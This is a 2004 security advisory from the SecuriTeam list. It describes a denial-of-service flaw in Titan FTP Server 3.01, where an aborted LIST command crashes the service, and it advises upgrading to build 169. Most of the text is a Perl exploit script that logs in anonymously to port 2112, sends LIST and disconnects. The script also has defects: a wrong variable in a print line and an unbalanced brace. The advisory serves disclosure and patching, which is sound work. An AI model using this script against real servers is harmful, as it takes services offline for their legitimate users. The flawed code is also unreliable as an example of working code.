[NT] Titan FTP Server Aborted LIST DoS

From: SecuriTeam (support_at_securiteam.com)
Date: 05/04/04

    To: list@securiteam.com
    Date: 4 May 2004 14:13:56 +0200

    - - promotion

    The SecuriTeam alerts list - Free, Accurate, Independent.

    Get your security news from a reliable source.

    - - - - - - - - -

      Titan FTP Server Aborted LIST DoS

    SUMMARY

    A security vulnerability exists in South River Technologies' Titan FTP
    Server, a user issuing a LIST command and disconnecting before the LIST
    command had the time to connect, will cause the program to try and access
    an invalid socket. This will result in the FTP service's crash (and in
    turn, no longer being able to service any additional users).

    DETAILS

    Vulnerable Systems:
     * Titan FTP Server version 3.01 build 163

    Immune Systems:
     * Titan FTP Server version 3.10 build 169

    Solution:
    To solve this issue upgrade to the latest version (3.10 build 169 or
    newer).

    Exploit:
    #!/usr/bin/perl
    # Test for Titan FTP server security vulnerability

    use IO::Socket;

    $host = "192.168.1.243";

    my @combination;
    $combination[0] = "LIST \r\n";

    for (my $i = 0; $combination[$i] ; $i++)
    {
     print "Combination: $1\n";

     $remote = IO::Socket::INET->new ( Proto => "tcp",
         PeerAddr => $host,
         PeerPort => "2112",
         );
     unless ($remote) { die "cannot connect to ftp daemon on $host" }

     print "connected\n";
     while (<$remote>)
     {
      print $_;
      if (/220 /)
      {
       last;
      }
     }

     $remote->autoflush(1);

     my $ftp = "USER anonymous\r\n";

     print $remote $ftp;
     print $ftp;

     while (<$remote>)
     {
      print $_;
      if (/331 /)
      {
       last;
      }
     }

     $ftp = "PASS a\@b.com\r\n";
     print $remote $ftp;
     print $ftp;

     while (<$remote>)
     {
      print $_;
      if (/230 /)
      {
       last;
      }
     }

     $ftp = $combination[$i];

     print $remote $ftp;
     print $ftp;

     while (<$remote>)
     {
      print $_;
      if (/150 /)
      {
       last;
      }

     close $remote;
    }

    ADDITIONAL INFORMATION

    SecurITeam would like to thank <mailto:storm@securiteam.com> STORM for
    finding this vulnerability.

    ====================
    ====================

    DISCLAIMER:
    The information in this bulletin is provided "AS IS" without warranty of any kind.
    In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

    • [TOOL] Fast SYN Scanner (libnet, libpcap)
      ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... struct bpf_program cfilter; ... const unsigned char *packet; ... In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages. ...
      (Securiteam)
    • [TOOL] P0f - Passive OS Fingerprinting Tool
      ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... Machines that connect to your box, ... Official SYN+ACK fingerprinting support ... In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages. ...
      (Securiteam)
    • [EXPL] TinyWeb Server DoS Exploit
      ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... The information in this bulletin is provided "AS IS" without warranty of any kind. ... In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages. ...
      (Securiteam)
    • [EXPL] 3Com FTP Server Buffer Overflow (CD)
      ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... overflow in its parsing of the 'CD' command. ... The information in this bulletin is provided "AS IS" without warranty of any kind. ... In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages. ...
      (Securiteam)
    • [TOOL] Automagic SQL Injector
      ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... The Automagic SQL Injector is part of the Sec-1 Exploit Arsenal provided ... The information in this bulletin is provided "AS IS" without warranty of any kind. ... In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages. ...
      (Securiteam)